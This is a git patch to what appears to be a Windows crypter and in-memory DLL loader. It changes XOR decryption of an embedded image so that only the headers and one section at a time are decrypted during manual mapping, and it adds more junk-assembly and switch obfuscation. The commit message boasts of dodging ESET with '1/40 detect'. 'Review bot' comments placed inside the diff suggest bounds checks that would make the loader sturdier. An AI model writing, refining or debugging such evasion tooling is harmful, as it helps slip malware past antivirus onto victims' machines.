From 49a4b62f0fe0aa9a22889fee56417f4b2242c057 Mon Sep 17 00:00:00 2001
From: ALittlePatate
Date: Thu, 21 Sep 2023 11:05:13 +0200
Subject: [PATCH] only decrypt stuff when using them, 1/40 detect fuck ESET, i got you !

https://kleenscan.com/scan_result/a58d3cad2abdfbb7a93b77deefd8dff4eed3a88af6e70d405768ed9c87dc8027
---
 DllExecutor.vcxproj | 1 +
 gui.py | 4 ++--
 main.cpp | 31 ++++++++++++++++++-------------
 obfuscation.py | 8 ++++----
 4 files changed, 25 insertions(+), 19 deletions(-)
diff --git a/DllExecutor.vcxproj b/DllExecutor.vcxproj
index 7768f06..7790671 100644
--- a/DllExecutor.vcxproj
+++ b/DllExecutor.vcxproj
@@ -109,6 +109,7 @@
 Disabled
 false
 EnableFastChecks
+ MultiThreadedDLL
 Windows
diff --git a/gui.py b/gui.py
index 7f228d6..83a2ae6 100644
--- a/gui.py
+++ b/gui.py
@@ -85,7 +85,7 @@ class Ui_mainWindow(object):
 self.spinBox = QtWidgets.QSpinBox(self.centralwidget)
 self.spinBox.setGeometry(QtCore.QRect(155, 118, 42, 22))
 self.spinBox.setObjectName("spinBox")
- self.spinBox.setValue(8)
+ self.spinBox.setValue(2)
 self.spinBox.setMinimum(1)
 self.label_3 = QtWidgets.QLabel(self.centralwidget)
 self.label_3.setGeometry(QtCore.QRect(120, 122, 47, 13))
@@ -96,7 +96,7 @@ class Ui_mainWindow(object):
 self.spinBox_2 = QtWidgets.QSpinBox(self.centralwidget)
 self.spinBox_2.setGeometry(QtCore.QRect(155, 138, 42, 22))
 self.spinBox_2.setObjectName("spinBox_2")
- self.spinBox_2.setValue(3)
+ self.spinBox_2.setValue(8)
 self.spinBox_2.setMinimum(1)
 self.checkBox_3 = QtWidgets.QCheckBox(self.centralwidget)
 self.checkBox_3.setGeometry(QtCore.QRect(20, 140, 91, 16))
diff --git a/main.cpp b/main.cpp
index ebeb1d0..fd3637c 100644
--- a/main.cpp
+++ b/main.cpp
@@ -30,6 +30,18 @@ Works with :
 - Doesn't copy headers
 */
+void decrypt(const char* key, int offset = 0, int limit = -1) {
+ //START
+ size_t key_size = strlen(key);
+ const int bufferSize = sizeof(sample) / sizeof(sample[0]);
+ if (limit == -1) limit = bufferSize;
+ if (key_size == 0) return;
+ for (int i = offset; i < limit ; i++) {
+ sample[i] ^= key[i%key_size];
+ }
+ //END
+}
+
 // This function will load a DLL from a buffer into the current process.
 // The DLL is expected to be in the PE format.
 //
@@ -48,6 +60,8 @@ HMODULE RunPE(const void* dll_buffer, size_t dll_size, DWORD newBase)
 return NULL;
 }
+ decrypt(KEY, 0, 1024); // decrypt only the header
+
 // Get a pointer to the DOS header.
 const IMAGE_DOS_HEADER* dos_header = static_cast(dll_buffer);
@@ -79,8 +93,10 @@ HMODULE RunPE(const void* dll_buffer, size_t dll_size, DWORD newBase)
 // Copy the section data to the allocated memory.
 for (WORD i = 0; i < nt_headers->FileHeader.NumberOfSections; ++i) {
 const IMAGE_SECTION_HEADER* section_header = section_headers + i;
+ decrypt(KEY, section_header->PointerToRawData, section_header->PointerToRawData + section_header->SizeOfRawData); //decrypt section
 memcpy(static_cast(image_base) + section_header->VirtualAddress, static_cast(dll_buffer) + section_header->PointerToRawData, section_header->SizeOfRawData);
- }
+ decrypt(KEY, section_header->PointerToRawData, section_header->PointerToRawData + section_header->SizeOfRawData); //encrypt back section
+ }
 DEBUG_PRINTF("[+] Wrote section data\n");
@@ -217,16 +233,6 @@ HMODULE RunPE(const void* dll_buffer, size_t dll_size, DWORD newBase)
 //END
 }
-void decrypt(const char* key) {
- //START
- size_t key_size = strlen(key);
- if (key_size == 0) return;
- for (int i = 0; i < sizeof(sample) / sizeof(sample[0]); i++) {
- sample[i] ^= key[i%key_size];
- }
- //END
-}
-
 void allo() {
 //START
 AllocConsole();
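Review bot: Neither `offset` nor `limit` is checked against `bufferSize` in the new decrypt(); only the `-1` sentinel is replaced, so any caller passing a value larger than the embedded buffer — and the section-sized calls added later in this commit pass raw PE header fields — XORs past the end of `sample`. Add `if (limit > bufferSize) limit = bufferSize;` and `if (offset < 0) offset = 0;` before the loop so the range always stays inside the array. The parameters are `int` while the callers hand over `DWORD` sums, so a value at or above 2^31 becomes negative and silently skips the loop instead of failing; `size_t` parameters with an explicit "to end" sentinel would be cleaner if nothing else depends on the `-1` default. A one-line comment above the function saying that it mutates the global `sample` in place and is its own inverse (the same absolute index `i % key_size` is used, so applying it twice over one range restores the bytes) would make the decrypt/encrypt-back pairing below easier to follow.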
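Review bot: `decrypt(KEY, 0, 1024)` hard-codes how much of the header is decrypted and never consults `dll_size`, so an embedded image shorter than 1024 bytes makes the call run off the end of `sample` (decrypt() does not clamp), while an image whose section table ends past offset 1024 has its later section headers parsed while still encrypted. Once `nt_headers` has been located, verify the assumption rather than trusting it: `if (dll_size < 1024 || dos_header->e_lfanew + 4 + sizeof(IMAGE_FILE_HEADER) + nt_headers->FileHeader.SizeOfOptionalHeader + nt_headers->FileHeader.NumberOfSections * sizeof(IMAGE_SECTION_HEADER) > 1024) return NULL;`, and hoist the literal into a named constant so the check and the call cannot drift apart. Note also that decrypt() works on the global `sample`, not on `dll_buffer`, so RunPE now only behaves correctly when the caller passes `sample` itself; a comment stating that coupling (or an assert that `dll_buffer == sample`) belongs next to the call. RunPE's body continues outside the hunk.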
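Review bot: The range handed to decrypt() is `PointerToRawData .. PointerToRawData + SizeOfRawData` taken straight from the section header with no check against `dll_size`, so a truncated or malformed embedded image makes the new call write past the end of `sample` before the existing memcpy (which has the same problem on its read side) is even reached, and the DWORD addition can wrap so that `limit < offset` and the section is copied without ever being decrypted. Guard the iteration before the first decrypt, bailing out the way the earlier header checks do: `if (section_header->SizeOfRawData > dll_size || section_header->PointerToRawData > dll_size - section_header->SizeOfRawData) return NULL;`. The matching bound on the destination, `VirtualAddress + SizeOfRawData <= SizeOfImage`, is outside this change but would sit naturally in the same guard. RunPE starts and ends outside the hunk.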
@@ -251,8 +257,7 @@ int __stdcall WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCm
 // Load the DLL from a buffer in memory
 const int bufferSize = sizeof(sample) / sizeof(sample[0]);
-
- decrypt(KEY);
+
 HMODULE dll = RunPE(sample, bufferSize, NEW_ADDRESS);
 if (dll == NULL) {
 DEBUG_PRINTF("[-] Failed to load DLL\n");
diff --git a/obfuscation.py b/obfuscation.py
index a7dc964..4a7bf4d 100644
--- a/obfuscation.py
+++ b/obfuscation.py
@@ -81,7 +81,7 @@ def GetAsmBlock(branch1, branch2, var, end, sub) :
 """+branch1+""":"""
- if GetRandomRange(0, 4) > 2 :
+ if GetRandomRange(0, 4) > 1 :
 branch1 = GetRandomString(20)
 branch2_ = GetRandomString(20)
 asm_block += GetAsmBlock(branch1, branch2_, var, end, sub)
@@ -102,7 +102,7 @@ def GetRandomAssemblyBlock() :
 r = """const char* """+var+""" = \""""+GetRandomString(5)+"""\";\n__asm {"""
- for i in range(GetRandomRange(0, 15)) :
+ for i in range(GetRandomRange(0, 30)) :
 branch1 = GetRandomString(20)
 branch2 = GetRandomString(20)
 end = GetRandomString(20)
@@ -115,11 +115,11 @@ def generate_switch_statement(variable_name, exit_value, depth=0):
 indent = " " * depth
 switch_code = f"{indent}switch ({variable_name}) {{\n"
- num_cases = GetRandomRange(1, 4)
+ num_cases = GetRandomRange(2, 5)
 for _ in range(num_cases):
 case_value = GetRandomRange(1, 10**6)
 switch_code += f"{indent} case {case_value}:\n"
- if depth < 2 and GetRandomRange(0, 4) > 2 :
+ if depth < 2 and GetRandomRange(0, 4) > 1 :
 switch_code += generate_switch_statement(variable_name, exit_value, depth + 1)
 else:
 switch_code += f"{indent} {{\n"